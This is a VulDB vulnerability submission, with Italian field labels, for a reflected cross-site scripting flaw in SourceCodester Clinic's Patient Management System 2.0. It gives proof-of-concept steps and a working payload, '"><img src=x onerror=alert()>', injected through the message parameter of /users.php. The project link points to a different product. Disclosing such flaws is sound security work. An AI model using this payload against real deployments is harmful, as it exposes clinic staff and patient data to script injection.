| Titolo | SourceCodester Clinics Patient Management System 2.0 Cross Site Scripting |
|---|
| Descrizione | Reflected XSS vulnerability was discovered in Sourcecodester's Clinic's Patient Management System - PHP 2.0 via message paramter
Affected Project: https://www.sourcecodester.com/php/17556/contact-manager-export-vcf-using-php-and-mysql-source-code.html
Official Website: Sourcecodester Clinic's Patient Management System
Version: 2.0
Releted Code: /users.php Line Number: 256-259
parameter: /users.php?message=hello
POC:
1. Download and setup the Clinic's Patient Management System - PHP 2.0
2.Login to the account and go to the "/users.php?message=hello
3. Now replace the message parameter value with xss payload
"><img src=x onerror=alert()>
4. Observer Reflected XSS
Direct link click after login: (for more details check advisory link)
5. http://192.168.95.115/users.php?message="><img src=x onerror=alert()>
|
|---|
| Fonte | ⚠️ https://github.com/gurudattch/CVEs/blob/main/Sourcecodester-Clinic's-Patient-Management-System-Reflected-XSS.md |
|---|
| Utente | guru (UID 74056) |
|---|
| Sottomissione | 04/09/2024 12:07 (2 anni fa) |
|---|
| Moderazione | 06/09/2024 23:22 (2 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 276773 [SourceCodester Clinics Patient Management System 2.0 /users.php Messaggio cross site scripting] |
|---|
| Punti | 20 |
|---|